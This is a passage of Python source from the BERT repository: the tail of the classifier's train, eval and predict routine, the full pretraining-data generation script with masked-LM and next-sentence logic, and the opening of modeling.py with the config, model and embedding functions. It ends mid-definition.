FLAGS.do_train: train_file = os.path.join(FLAGS.output_dir, "train.tf_record") file_based_convert_examples_to_features( train_examples, label_list, FLAGS.max_seq_length, tokenizer, train_file) tf.logging.info("***** Running training *****") tf.logging.info(" Num examples = %d", len(train_examples)) tf.logging.info(" Batch size = %d", FLAGS.train_batch_size) tf.logging.info(" Num steps = %d", num_train_steps) train_input_fn = file_based_input_fn_builder( input_file=train_file, seq_length=FLAGS.max_seq_length, is_training=True, drop_remainder=True) estimator.train(input_fn=train_input_fn, max_steps=num_train_steps) if FLAGS.do_eval: eval_examples = processor.get_dev_examples(FLAGS.data_dir) num_actual_eval_examples = len(eval_examples) if FLAGS.use_tpu: # TPU requires a fixed batch size for all batches, therefore the number # of examples must be a multiple of the batch size, or else examples # will get dropped. So we pad with fake examples which are ignored # later on. These do NOT count towards the metric (all tf.metrics # support a per-instance weight, and these get a weight of 0.0). while len(eval_examples) % FLAGS.eval_batch_size != 0: eval_examples.append(PaddingInputExample()) eval_file = os.path.join(FLAGS.output_dir, "eval.tf_record") file_based_convert_examples_to_features( eval_examples, label_list, FLAGS.max_seq_length, tokenizer, eval_file) tf.logging.info("***** Running evaluation *****") tf.logging.info(" Num examples = %d (%d actual, %d padding)", len(eval_examples), num_actual_eval_examples, len(eval_examples) - num_actual_eval_examples) tf.logging.info(" Batch size = %d", FLAGS.eval_batch_size) # This tells the estimator to run through the entire set. eval_steps = None # However, if running eval on the TPU, you will need to specify the # number of steps. 
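# Worked example of the padding logic above (invented numbers): with 403 real
# dev examples and eval_batch_size=8, five PaddingInputExample fakes are
# appended so len(eval_examples) == 408 and eval_steps = 408 // 8 = 51; the
# fakes carry is_real_example=0, so they contribute zero weight to the
# accuracy and loss metrics.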
if FLAGS.use_tpu: assert len(eval_examples) % FLAGS.eval_batch_size == 0 eval_steps = int(len(eval_examples) // FLAGS.eval_batch_size) eval_drop_remainder = True if FLAGS.use_tpu else False eval_input_fn = file_based_input_fn_builder( input_file=eval_file, seq_length=FLAGS.max_seq_length, is_training=False, drop_remainder=eval_drop_remainder) result = estimator.evaluate(input_fn=eval_input_fn, steps=eval_steps) output_eval_file = os.path.join(FLAGS.output_dir, "eval_results.txt") with tf.gfile.GFile(output_eval_file, "w") as writer: tf.logging.info("***** Eval results *****") for key in sorted(result.keys()): tf.logging.info(" %s = %s", key, str(result[key])) writer.write("%s = %s\n" % (key, str(result[key]))) if FLAGS.do_predict: predict_examples = processor.get_test_examples(FLAGS.data_dir) num_actual_predict_examples = len(predict_examples) if FLAGS.use_tpu: # TPU requires a fixed batch size for all batches, therefore the number # of examples must be a multiple of the batch size, or else examples # will get dropped. So we pad with fake examples which are ignored # later on. while len(predict_examples) % FLAGS.predict_batch_size != 0: predict_examples.append(PaddingInputExample()) predict_file = os.path.join(FLAGS.output_dir, "predict.tf_record") file_based_convert_examples_to_features(predict_examples, label_list, FLAGS.max_seq_length, tokenizer, predict_file) tf.logging.info("***** Running prediction*****") tf.logging.info(" Num examples = %d (%d actual, %d padding)", len(predict_examples), num_actual_predict_examples, len(predict_examples) - num_actual_predict_examples) tf.logging.info(" Batch size = %d", FLAGS.predict_batch_size) predict_drop_remainder = True if FLAGS.use_tpu else False predict_input_fn = file_based_input_fn_builder( input_file=predict_file, seq_length=FLAGS.max_seq_length, is_training=False, drop_remainder=predict_drop_remainder) result = estimator.predict(input_fn=predict_input_fn) output_predict_file = os.path.join(FLAGS.output_dir, "test_results.tsv") with tf.gfile.GFile(output_predict_file, "w") as writer: num_written_lines = 0 tf.logging.info("***** Predict results *****") for (i, prediction) in enumerate(result): probabilities = prediction["probabilities"] if i >= num_actual_predict_examples: break output_line = "\t".join( str(class_probability) for class_probability in probabilities) + "\n" writer.write(output_line) num_written_lines += 1 assert num_written_lines == num_actual_predict_examples if __name__ == "__main__": flags.mark_flag_as_required("data_dir") flags.mark_flag_as_required("task_name") flags.mark_flag_as_required("vocab_file") flags.mark_flag_as_required("bert_config_file") flags.mark_flag_as_required("output_dir") tf.app.run() File: create_pretraining_data.py # coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
"""Create masked LM/next sentence masked_lm TF examples for BERT.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import random import tokenization import tensorflow as tf flags = tf.flags FLAGS = flags.FLAGS flags.DEFINE_string("input_file", None, "Input raw text file (or comma-separated list of files).") flags.DEFINE_string( "output_file", None, "Output TF example file (or comma-separated list of files).") flags.DEFINE_string("vocab_file", None, "The vocabulary file that the BERT model was trained on.") flags.DEFINE_bool( "do_lower_case", True, "Whether to lower case the input text. Should be True for uncased " "models and False for cased models.") flags.DEFINE_bool( "do_whole_word_mask", False, "Whether to use whole word masking rather than per-WordPiece masking.") flags.DEFINE_integer("max_seq_length", 128, "Maximum sequence length.") flags.DEFINE_integer("max_predictions_per_seq", 20, "Maximum number of masked LM predictions per sequence.") flags.DEFINE_integer("random_seed", 12345, "Random seed for data generation.") flags.DEFINE_integer( "dupe_factor", 10, "Number of times to duplicate the input data (with different masks).") flags.DEFINE_float("masked_lm_prob", 0.15, "Masked LM probability.") flags.DEFINE_float( "short_seq_prob", 0.1, "Probability of creating sequences which are shorter than the " "maximum length.") class TrainingInstance(object): """A single training instance (sentence pair).""" def __init__(self, tokens, segment_ids, masked_lm_positions, masked_lm_labels, is_random_next): self.tokens = tokens self.segment_ids = segment_ids self.is_random_next = is_random_next self.masked_lm_positions = masked_lm_positions self.masked_lm_labels = masked_lm_labels def __str__(self): s = "" s += "tokens: %s\n" % (" ".join( [tokenization.printable_text(x) for x in self.tokens])) s += "segment_ids: %s\n" % (" ".join([str(x) for x in self.segment_ids])) s += "is_random_next: %s\n" % self.is_random_next s += "masked_lm_positions: %s\n" % (" ".join( [str(x) for x in self.masked_lm_positions])) s += "masked_lm_labels: %s\n" % (" ".join( [tokenization.printable_text(x) for x in self.masked_lm_labels])) s += "\n" return s def __repr__(self): return self.__str__() def write_instance_to_example_files(instances, tokenizer, max_seq_length, max_predictions_per_seq, output_files): """Create TF example files from `TrainingInstance`s.""" writers = [] for output_file in output_files: writers.append(tf.python_io.TFRecordWriter(output_file)) writer_index = 0 total_written = 0 for (inst_index, instance) in enumerate(instances): input_ids = tokenizer.convert_tokens_to_ids(instance.tokens) input_mask = [1] * len(input_ids) segment_ids = list(instance.segment_ids) assert len(input_ids) <= max_seq_length while len(input_ids) < max_seq_length: input_ids.append(0) input_mask.append(0) segment_ids.append(0) assert len(input_ids) == max_seq_length assert len(input_mask) == max_seq_length assert len(segment_ids) == max_seq_length masked_lm_positions = list(instance.masked_lm_positions) masked_lm_ids = tokenizer.convert_tokens_to_ids(instance.masked_lm_labels) masked_lm_weights = [1.0] * len(masked_lm_ids) while len(masked_lm_positions) < max_predictions_per_seq: masked_lm_positions.append(0) masked_lm_ids.append(0) masked_lm_weights.append(0.0) next_sentence_label = 1 if instance.is_random_next else 0 features = collections.OrderedDict() features["input_ids"] = create_int_feature(input_ids) features["input_mask"] = 
create_int_feature(input_mask) features["segment_ids"] = create_int_feature(segment_ids) features["masked_lm_positions"] = create_int_feature(masked_lm_positions) features["masked_lm_ids"] = create_int_feature(masked_lm_ids) features["masked_lm_weights"] = create_float_feature(masked_lm_weights) features["next_sentence_labels"] = create_int_feature([next_sentence_label]) tf_example = tf.train.Example(features=tf.train.Features(feature=features)) writers[writer_index].write(tf_example.SerializeToString()) writer_index = (writer_index + 1) % len(writers) total_written += 1 if inst_index < 20: tf.logging.info("*** Example ***") tf.logging.info("tokens: %s" % " ".join( [tokenization.printable_text(x) for x in instance.tokens])) for feature_name in features.keys(): feature = features[feature_name] values = [] if feature.int64_list.value: values = feature.int64_list.value elif feature.float_list.value: values = feature.float_list.value tf.logging.info( "%s: %s" % (feature_name, " ".join([str(x) for x in values]))) for writer in writers: writer.close() tf.logging.info("Wrote %d total instances", total_written) def create_int_feature(values): feature = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values))) return feature def create_float_feature(values): feature = tf.train.Feature(float_list=tf.train.FloatList(value=list(values))) return feature def create_training_instances(input_files, tokenizer, max_seq_length, dupe_factor, short_seq_prob, masked_lm_prob, max_predictions_per_seq, rng): """Create `TrainingInstance`s from raw text.""" all_documents = [[]] # Input file format: # (1) One sentence per line. These should ideally be actual sentences, not # entire paragraphs or arbitrary spans of text. (Because we use the # sentence boundaries for the "next sentence prediction" task). # (2) Blank lines between documents. Document boundaries are needed so # that the "next sentence prediction" task doesn't span between documents. for input_file in input_files: with tf.gfile.GFile(input_file, "r") as reader: while True: line = tokenization.convert_to_unicode(reader.readline()) if not line: break line = line.strip() # Empty lines are used as document delimiters if not line: all_documents.append([]) tokens = tokenizer.tokenize(line) if tokens: all_documents[-1].append(tokens) # Remove empty documents all_documents = [x for x in all_documents if x] rng.shuffle(all_documents) vocab_words = list(tokenizer.vocab.keys()) instances = [] for _ in range(dupe_factor): for document_index in range(len(all_documents)): instances.extend( create_instances_from_document( all_documents, document_index, max_seq_length, short_seq_prob, masked_lm_prob, max_predictions_per_seq, vocab_words, rng)) rng.shuffle(instances) return instances def create_instances_from_document( all_documents, document_index, max_seq_length, short_seq_prob, masked_lm_prob, max_predictions_per_seq, vocab_words, rng): """Creates `TrainingInstance`s for a single document.""" document = all_documents[document_index] # Account for [CLS], [SEP], [SEP] max_num_tokens = max_seq_length - 3 # We *usually* want to fill up the entire sequence since we are padding # to `max_seq_length` anyways, so short sequences are generally wasted # computation. However, we *sometimes* # (i.e., short_seq_prob == 0.1 == 10% of the time) want to use shorter # sequences to minimize the mismatch between pre-training and fine-tuning. # The `target_seq_length` is just a rough target however, whereas # `max_seq_length` is a hard limit. 
target_seq_length = max_num_tokens if rng.random() < short_seq_prob: target_seq_length = rng.randint(2, max_num_tokens) # We DON'T just concatenate all of the tokens from a document into a long # sequence and choose an arbitrary split point because this would make the # next sentence prediction task too easy. Instead, we split the input into # segments "A" and "B" based on the actual "sentences" provided by the user # input. instances = [] current_chunk = [] current_length = 0 i = 0 while i < len(document): segment = document[i] current_chunk.append(segment) current_length += len(segment) if i == len(document) - 1 or current_length >= target_seq_length: if current_chunk: # `a_end` is how many segments from `current_chunk` go into the `A` # (first) sentence. a_end = 1 if len(current_chunk) >= 2: a_end = rng.randint(1, len(current_chunk) - 1) tokens_a = [] for j in range(a_end): tokens_a.extend(current_chunk[j]) tokens_b = [] # Random next is_random_next = False if len(current_chunk) == 1 or rng.random() < 0.5: is_random_next = True target_b_length = target_seq_length - len(tokens_a) # This should rarely go for more than one iteration for large # corpora. However, just to be careful, we try to make sure that # the random document is not the same as the document # we're processing. for _ in range(10): random_document_index = rng.randint(0, len(all_documents) - 1) if random_document_index != document_index: break random_document = all_documents[random_document_index] random_start = rng.randint(0, len(random_document) - 1) for j in range(random_start, len(random_document)): tokens_b.extend(random_document[j]) if len(tokens_b) >= target_b_length: break # We didn't actually use these segments so we "put them back" so # they don't go to waste. num_unused_segments = len(current_chunk) - a_end i -= num_unused_segments # Actual next else: is_random_next = False for j in range(a_end, len(current_chunk)): tokens_b.extend(current_chunk[j]) truncate_seq_pair(tokens_a, tokens_b, max_num_tokens, rng) assert len(tokens_a) >= 1 assert len(tokens_b) >= 1 tokens = [] segment_ids = [] tokens.append("[CLS]") segment_ids.append(0) for token in tokens_a: tokens.append(token) segment_ids.append(0) tokens.append("[SEP]") segment_ids.append(0) for token in tokens_b: tokens.append(token) segment_ids.append(1) tokens.append("[SEP]") segment_ids.append(1) (tokens, masked_lm_positions, masked_lm_labels) = create_masked_lm_predictions( tokens, masked_lm_prob, max_predictions_per_seq, vocab_words, rng) instance = TrainingInstance( tokens=tokens, segment_ids=segment_ids, is_random_next=is_random_next, masked_lm_positions=masked_lm_positions, masked_lm_labels=masked_lm_labels) instances.append(instance) current_chunk = [] current_length = 0 i += 1 return instances MaskedLmInstance = collections.namedtuple("MaskedLmInstance", ["index", "label"]) def create_masked_lm_predictions(tokens, masked_lm_prob, max_predictions_per_seq, vocab_words, rng): """Creates the predictions for the masked LM objective.""" cand_indexes = [] for (i, token) in enumerate(tokens): if token == "[CLS]" or token == "[SEP]": continue # Whole Word Masking means that if we mask all of the wordpieces # corresponding to an original word. When a word has been split into # WordPieces, the first token does not have any marker and any subsequence # tokens are prefixed with ##. So whenever we see the ## token, we # append it to the previous set of word indexes. 
# # Note that Whole Word Masking does *not* change the training code # at all -- we still predict each WordPiece independently, softmaxed # over the entire vocabulary. if (FLAGS.do_whole_word_mask and len(cand_indexes) >= 1 and token.startswith("##")): cand_indexes[-1].append(i) else: cand_indexes.append([i]) rng.shuffle(cand_indexes) output_tokens = list(tokens) num_to_predict = min(max_predictions_per_seq, max(1, int(round(len(tokens) * masked_lm_prob)))) masked_lms = [] covered_indexes = set() for index_set in cand_indexes: if len(masked_lms) >= num_to_predict: break # If adding a whole-word mask would exceed the maximum number of # predictions, then just skip this candidate. if len(masked_lms) + len(index_set) > num_to_predict: continue is_any_index_covered = False for index in index_set: if index in covered_indexes: is_any_index_covered = True break if is_any_index_covered: continue for index in index_set: covered_indexes.add(index) masked_token = None # 80% of the time, replace with [MASK] if rng.random() < 0.8: masked_token = "[MASK]" else: # 10% of the time, keep original if rng.random() < 0.5: masked_token = tokens[index] # 10% of the time, replace with random word else: masked_token = vocab_words[rng.randint(0, len(vocab_words) - 1)] output_tokens[index] = masked_token masked_lms.append(MaskedLmInstance(index=index, label=tokens[index])) assert len(masked_lms) <= num_to_predict masked_lms = sorted(masked_lms, key=lambda x: x.index) masked_lm_positions = [] masked_lm_labels = [] for p in masked_lms: masked_lm_positions.append(p.index) masked_lm_labels.append(p.label) return (output_tokens, masked_lm_positions, masked_lm_labels) def truncate_seq_pair(tokens_a, tokens_b, max_num_tokens, rng): """Truncates a pair of sequences to a maximum sequence length.""" while True: total_length = len(tokens_a) + len(tokens_b) if total_length <= max_num_tokens: break trunc_tokens = tokens_a if len(tokens_a) > len(tokens_b) else tokens_b assert len(trunc_tokens) >= 1 # We want to sometimes truncate from the front and sometimes from the # back to add more randomness and avoid biases. if rng.random() < 0.5: del trunc_tokens[0] else: trunc_tokens.pop() def main(_): tf.logging.set_verbosity(tf.logging.INFO) tokenizer = tokenization.FullTokenizer( vocab_file=FLAGS.vocab_file, do_lower_case=FLAGS.do_lower_case) input_files = [] for input_pattern in FLAGS.input_file.split(","): input_files.extend(tf.gfile.Glob(input_pattern)) tf.logging.info("*** Reading from input files ***") for input_file in input_files: tf.logging.info(" %s", input_file) rng = random.Random(FLAGS.random_seed) instances = create_training_instances( input_files, tokenizer, FLAGS.max_seq_length, FLAGS.dupe_factor, FLAGS.short_seq_prob, FLAGS.masked_lm_prob, FLAGS.max_predictions_per_seq, rng) output_files = FLAGS.output_file.split(",") tf.logging.info("*** Writing to output files ***") for output_file in output_files: tf.logging.info(" %s", output_file) write_instance_to_example_files(instances, tokenizer, FLAGS.max_seq_length, FLAGS.max_predictions_per_seq, output_files) if __name__ == "__main__": flags.mark_flag_as_required("input_file") flags.mark_flag_as_required("output_file") flags.mark_flag_as_required("vocab_file") tf.app.run() File: modeling.py # coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """The main BERT model and related functions.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import copy import json import math import re import numpy as np import six import tensorflow as tf class BertConfig(object): """Configuration for `BertModel`.""" def __init__(self, vocab_size, hidden_size=768, num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072, hidden_act="gelu", hidden_dropout_prob=0.1, attention_probs_dropout_prob=0.1, max_position_embeddings=512, type_vocab_size=16, initializer_range=0.02): """Constructs BertConfig. Args: vocab_size: Vocabulary size of `inputs_ids` in `BertModel`. hidden_size: Size of the encoder layers and the pooler layer. num_hidden_layers: Number of hidden layers in the Transformer encoder. num_attention_heads: Number of attention heads for each attention layer in the Transformer encoder. intermediate_size: The size of the "intermediate" (i.e., feed-forward) layer in the Transformer encoder. hidden_act: The non-linear activation function (function or string) in the encoder and pooler. hidden_dropout_prob: The dropout probability for all fully connected layers in the embeddings, encoder, and pooler. attention_probs_dropout_prob: The dropout ratio for the attention probabilities. max_position_embeddings: The maximum sequence length that this model might ever be used with. Typically set this to something large just in case (e.g., 512 or 1024 or 2048). type_vocab_size: The vocabulary size of the `token_type_ids` passed into `BertModel`. initializer_range: The stdev of the truncated_normal_initializer for initializing all weight matrices. """ self.vocab_size = vocab_size self.hidden_size = hidden_size self.num_hidden_layers = num_hidden_layers self.num_attention_heads = num_attention_heads self.hidden_act = hidden_act self.intermediate_size = intermediate_size self.hidden_dropout_prob = hidden_dropout_prob self.attention_probs_dropout_prob = attention_probs_dropout_prob self.max_position_embeddings = max_position_embeddings self.type_vocab_size = type_vocab_size self.initializer_range = initializer_range @classmethod def from_dict(cls, json_object): """Constructs a `BertConfig` from a Python dictionary of parameters.""" config = BertConfig(vocab_size=None) for (key, value) in six.iteritems(json_object): config.__dict__[key] = value return config @classmethod def from_json_file(cls, json_file): """Constructs a `BertConfig` from a json file of parameters.""" with tf.gfile.GFile(json_file, "r") as reader: text = reader.read() return cls.from_dict(json.loads(text)) def to_dict(self): """Serializes this instance to a Python dictionary.""" output = copy.deepcopy(self.__dict__) return output def to_json_string(self): """Serializes this instance to a JSON string.""" return json.dumps(self.to_dict(), indent=2, sort_keys=True) + "\n" class BertModel(object): """BERT model ("Bidirectional Encoder Representations from Transformers"). 
Example usage: ```python # Already been converted into WordPiece token ids input_ids = tf.constant([[31, 51, 99], [15, 5, 0]]) input_mask = tf.constant([[1, 1, 1], [1, 1, 0]]) token_type_ids = tf.constant([[0, 0, 1], [0, 2, 0]]) config = modeling.BertConfig(vocab_size=32000, hidden_size=512, num_hidden_layers=8, num_attention_heads=6, intermediate_size=1024) model = modeling.BertModel(config=config, is_training=True, input_ids=input_ids, input_mask=input_mask, token_type_ids=token_type_ids) label_embeddings = tf.get_variable(...) pooled_output = model.get_pooled_output() logits = tf.matmul(pooled_output, label_embeddings) ... ``` """ def __init__(self, config, is_training, input_ids, input_mask=None, token_type_ids=None, use_one_hot_embeddings=False, scope=None): """Constructor for BertModel. Args: config: `BertConfig` instance. is_training: bool. true for training model, false for eval model. Controls whether dropout will be applied. input_ids: int32 Tensor of shape [batch_size, seq_length]. input_mask: (optional) int32 Tensor of shape [batch_size, seq_length]. token_type_ids: (optional) int32 Tensor of shape [batch_size, seq_length]. use_one_hot_embeddings: (optional) bool. Whether to use one-hot word embeddings or tf.embedding_lookup() for the word embeddings. scope: (optional) variable scope. Defaults to "bert". Raises: ValueError: The config is invalid or one of the input tensor shapes is invalid. """ config = copy.deepcopy(config) if not is_training: config.hidden_dropout_prob = 0.0 config.attention_probs_dropout_prob = 0.0 input_shape = get_shape_list(input_ids, expected_rank=2) batch_size = input_shape[0] seq_length = input_shape[1] if input_mask is None: input_mask = tf.ones(shape=[batch_size, seq_length], dtype=tf.int32) if token_type_ids is None: token_type_ids = tf.zeros(shape=[batch_size, seq_length], dtype=tf.int32) with tf.variable_scope(scope, default_name="bert"): with tf.variable_scope("embeddings"): # Perform embedding lookup on the word ids. (self.embedding_output, self.embedding_table) = embedding_lookup( input_ids=input_ids, vocab_size=config.vocab_size, embedding_size=config.hidden_size, initializer_range=config.initializer_range, word_embedding_name="word_embeddings", use_one_hot_embeddings=use_one_hot_embeddings) # Add positional embeddings and token type embeddings, then layer # normalize and perform dropout. self.embedding_output = embedding_postprocessor( input_tensor=self.embedding_output, use_token_type=True, token_type_ids=token_type_ids, token_type_vocab_size=config.type_vocab_size, token_type_embedding_name="token_type_embeddings", use_position_embeddings=True, position_embedding_name="position_embeddings", initializer_range=config.initializer_range, max_position_embeddings=config.max_position_embeddings, dropout_prob=config.hidden_dropout_prob) with tf.variable_scope("encoder"): # This converts a 2D mask of shape [batch_size, seq_length] to a 3D # mask of shape [batch_size, seq_length, seq_length] which is used # for the attention scores. attention_mask = create_attention_mask_from_input_mask( input_ids, input_mask) # Run the stacked transformer. # `sequence_output` shape = [batch_size, seq_length, hidden_size]. 
self.all_encoder_layers = transformer_model( input_tensor=self.embedding_output, attention_mask=attention_mask, hidden_size=config.hidden_size, num_hidden_layers=config.num_hidden_layers, num_attention_heads=config.num_attention_heads, intermediate_size=config.intermediate_size, intermediate_act_fn=get_activation(config.hidden_act), hidden_dropout_prob=config.hidden_dropout_prob, attention_probs_dropout_prob=config.attention_probs_dropout_prob, initializer_range=config.initializer_range, do_return_all_layers=True) self.sequence_output = self.all_encoder_layers[-1] # The "pooler" converts the encoded sequence tensor of shape # [batch_size, seq_length, hidden_size] to a tensor of shape # [batch_size, hidden_size]. This is necessary for segment-level # (or segment-pair-level) classification tasks where we need a fixed # dimensional representation of the segment. with tf.variable_scope("pooler"): # We "pool" the model by simply taking the hidden state corresponding # to the first token. We assume that this has been pre-trained first_token_tensor = tf.squeeze(self.sequence_output[:, 0:1, :], axis=1) self.pooled_output = tf.layers.dense( first_token_tensor, config.hidden_size, activation=tf.tanh, kernel_initializer=create_initializer(config.initializer_range)) def get_pooled_output(self): return self.pooled_output def get_sequence_output(self): """Gets final hidden layer of encoder. Returns: float Tensor of shape [batch_size, seq_length, hidden_size] corresponding to the final hidden of the transformer encoder. """ return self.sequence_output def get_all_encoder_layers(self): return self.all_encoder_layers def get_embedding_output(self): """Gets output of the embedding lookup (i.e., input to the transformer). Returns: float Tensor of shape [batch_size, seq_length, hidden_size] corresponding to the output of the embedding layer, after summing the word embeddings with the positional embeddings and the token type embeddings, then performing layer normalization. This is the input to the transformer. """ return self.embedding_output def get_embedding_table(self): return self.embedding_table def gelu(x): """Gaussian Error Linear Unit. This is a smoother version of the RELU. Original paper: https://arxiv.org/abs/1606.08415 Args: x: float Tensor to perform activation. Returns: `x` with the GELU activation applied. """ cdf = 0.5 * (1.0 + tf.tanh( (np.sqrt(2 / np.pi) * (x + 0.044715 * tf.pow(x, 3))))) return x * cdf def get_activation(activation_string): """Maps a string to a Python function, e.g., "relu" => `tf.nn.relu`. Args: activation_string: String name of the activation function. Returns: A Python function corresponding to the activation function. If `activation_string` is None, empty, or "linear", this will return None. If `activation_string` is not a string, it will return `activation_string`. Raises: ValueError: The `activation_string` does not correspond to a known activation. """ # We assume that anything that"s not a string is already an activation # function, so we just return it. 
if not isinstance(activation_string, six.string_types): return activation_string if not activation_string: return None act = activation_string.lower() if act == "linear": return None elif act == "relu": return tf.nn.relu elif act == "gelu": return gelu elif act == "tanh": return tf.tanh else: raise ValueError("Unsupported activation: %s" % act) def get_assignment_map_from_checkpoint(tvars, init_checkpoint): """Compute the union of the current variables and checkpoint variables.""" assignment_map = {} initialized_variable_names = {} name_to_variable = collections.OrderedDict() for var in tvars: name = var.name m = re.match("^(.*):\\d+$", name) if m is not None: name = m.group(1) name_to_variable[name] = var init_vars = tf.train.list_variables(init_checkpoint) assignment_map = collections.OrderedDict() for x in init_vars: (name, var) = (x[0], x[1]) if name not in name_to_variable: continue assignment_map[name] = name initialized_variable_names[name] = 1 initialized_variable_names[name + ":0"] = 1 return (assignment_map, initialized_variable_names) def dropout(input_tensor, dropout_prob): """Perform dropout. Args: input_tensor: float Tensor. dropout_prob: Python float. The probability of dropping out a value (NOT of *keeping* a dimension as in `tf.nn.dropout`). Returns: A version of `input_tensor` with dropout applied. """ if dropout_prob is None or dropout_prob == 0.0: return input_tensor output = tf.nn.dropout(input_tensor, 1.0 - dropout_prob) return output def layer_norm(input_tensor, name=None): """Run layer normalization on the last dimension of the tensor.""" return tf.contrib.layers.layer_norm( inputs=input_tensor, begin_norm_axis=-1, begin_params_axis=-1, scope=name) def layer_norm_and_dropout(input_tensor, dropout_prob, name=None): """Runs layer normalization followed by dropout.""" output_tensor = layer_norm(input_tensor, name) output_tensor = dropout(output_tensor, dropout_prob) return output_tensor def create_initializer(initializer_range=0.02): """Creates a `truncated_normal_initializer` with the given range.""" return tf.truncated_normal_initializer(stddev=initializer_range) def embedding_lookup(input_ids, vocab_size, embedding_size=128, initializer_range=0.02, word_embedding_name="word_embeddings", use_one_hot_embeddings=False): """Looks up words embeddings for id tensor. Args: input_ids: int32 Tensor of shape [batch_size, seq_length] containing word ids. vocab_size: int. Size of the embedding vocabulary. embedding_size: int. Width of the word embeddings. initializer_range: float. Embedding initialization range. word_embedding_name: string. Name of the embedding table. use_one_hot_embeddings: bool. If True, use one-hot method for word embeddings. If False, use `tf.gather()`. Returns: float Tensor of shape [batch_size, seq_length, embedding_size]. """ # This function assumes that the input is of shape [batch_size, seq_length, # num_inputs]. # # If the input is a 2D tensor of shape [batch_size, seq_length], we # reshape to [batch_size, seq_length, 1]. 
if input_ids.shape.ndims == 2: input_ids = tf.expand_dims(input_ids, axis=[-1]) embedding_table = tf.get_variable( name=word_embedding_name, shape=[vocab_size, embedding_size], initializer=create_initializer(initializer_range)) flat_input_ids = tf.reshape(input_ids, [-1]) if use_one_hot_embeddings: one_hot_input_ids = tf.one_hot(flat_input_ids, depth=vocab_size) output = tf.matmul(one_hot_input_ids, embedding_table) else: output = tf.gather(embedding_table, flat_input_ids) input_shape = get_shape_list(input_ids) output = tf.reshape(output, input_shape[0:-1] + [input_shape[-1] * embedding_size]) return (output, embedding_table) def embedding_postprocessor(input_tensor, use_token_type=False, token_type_ids=None, token_type_vocab_size=16, token_type_embedding_name="token_type_embeddings", use_position_embeddings=True, position_embedding_name="position_embeddings", initializer_range=0.02, max_position_embeddings=512, dropout_prob=0.1): """Performs various post-processing on a word embedding tensor. Args: input_tensor: float Tensor of shape [batch_size, seq_length, embedding_size]. use_token_type: bool. Whether to add embeddings for `token_type_ids`. token_type_ids: (optional) int32 Tensor of shape [batch_size, seq_length]. Must be specified if `use_token_type` is True. token_type_vocab_size: int. The vocabulary size of `token_type_ids`. token_type_embedding_name: string. The name of the embedding table variable for token type ids. use_position_embeddings: bool. Whether to add position embeddings for the position of each token in the sequence. position_embedding_name: string. The name of the embedding table variable for positional embeddings. initializer_range: float. Range of the weight initialization. max_position_embeddings: int. Maximum sequence length that might ever be used with this model. This can be longer than the sequence length of input_tensor, but cannot be shorter. dropout_prob: float. Dropout probability applied to the final output tensor. Returns: float tensor with same shape as `input_tensor`. Raises: ValueError: One of the tensor shapes or input values is invalid. """ input_shape = get_shape_list(input_tensor, expected_rank=3) batch_size = input_shape[0] seq_length = input_shape[1] width = input_shape[2] output = input_tensor if use_token_type: if token_type_ids is None: raise ValueError("`token_type_ids` must be specified if" "`use_token_type` is True.") token_type_table = tf.get_variable( name=token_type_embedding_name, shape=[token_type_vocab_size, width], initializer=create_initializer(initializer_range)) # This vocab will be small so we always do one-hot here, since it is always # faster for a small vocabulary. flat_token_type_ids = tf.reshape(token_type_ids, [-1]) one_hot_ids = tf.one_hot(flat_token_type_ids, depth=token_type_vocab_size) token_type_embeddings = tf.matmul(one_hot_ids, token_type_table) token_type_embeddings = tf.reshape(token_type_embeddings, [batch_size, seq_length, width]) output += token_type_embeddings if use_position_embeddings: assert_op = tf.assert_less_equal(seq_length, max_position_embeddings) with tf.control_dependencies([assert_op]): full_position_embeddings = tf.get_variable( name=position_embedding_name, shape=[max_position_embeddings, width], initializer=create_initializer(initializer_range)) # Since the position embedding table is a learned variable, we create it # using a (long) sequence length `max_position_embeddings`. The actual # sequence length might be shorter than this, for faster training of # tasks that do not have long sequences. 
# # So `full_position_embeddings` is effectively an embedding table # for position [0, 1, 2, ..., max_position_embeddings-1], and the current # sequence has positions [0, 1, 2, ... seq_length-1], so we can just # perform a slice. position_embeddings = tf.slice(full_position_embeddings, [0, 0], [seq_length, -1]) num_dims = len(output.shape.as_list()) # Only the last two dimensions are relevant (`seq_length` and `width`), so # we broadcast among the first dimensions, which is typically just # the batch size. position_broadcast_shape = [] for _ in range(num_dims - 2): position_broadcast_shape.append(1) position_broadcast_shape.extend([seq_length, width]) position_embeddings = tf.reshape(position_embeddings, position_broadcast_shape) output += position_embeddings output = layer_norm_and_dropout(output, dropout_prob) return output def create_attention_mask_from_input_mask(from_tensor, to_mask): """Create 3D attention mask from a 2D tensor mask. Args: from_tensor: 2D or 3D Tensor of shape [batch_size, from_seq_length, ...]. to_mask: int32 Tensor of shape [batch_size, to_seq_length]. Returns: float Tensor of shape [batch_size, from_seq_length, to_seq_length]. """ from_shape = get_shape_list(from_tensor, expected_rank=[2, 3]) batch_size = from_shape[0] from_seq_length = from_shape[1] to_shape = get_shape_list(to_mask, expected_rank=2) to_seq_length = to_shape[1] to_mask = tf.cast( tf.reshape(to_mask, [batch_size, 1, to_seq_length]), tf.float32) # We don't assume that `from_tensor` is a mask (although it could be). We # don't actually care if we attend *from* padding tokens (only *to* padding) # tokens so we create a tensor of all ones. # # `broadcast_ones` = [batch_size, from_seq_length, 1] broadcast_ones = tf.ones( shape=[batch_size, from_seq_length, 1], dtype=tf.float32) # Here we broadcast along two dimensions to create the mask. mask = broadcast_ones * to_mask return mask def attention_layer(from_tensor, to_tensor, attention_mask=None, num_attention_heads=1, size_per_head=512, query_act=None, key_act=None, value_act=None, attention_probs_dropout_prob=0.0, initializer_range=0.02, 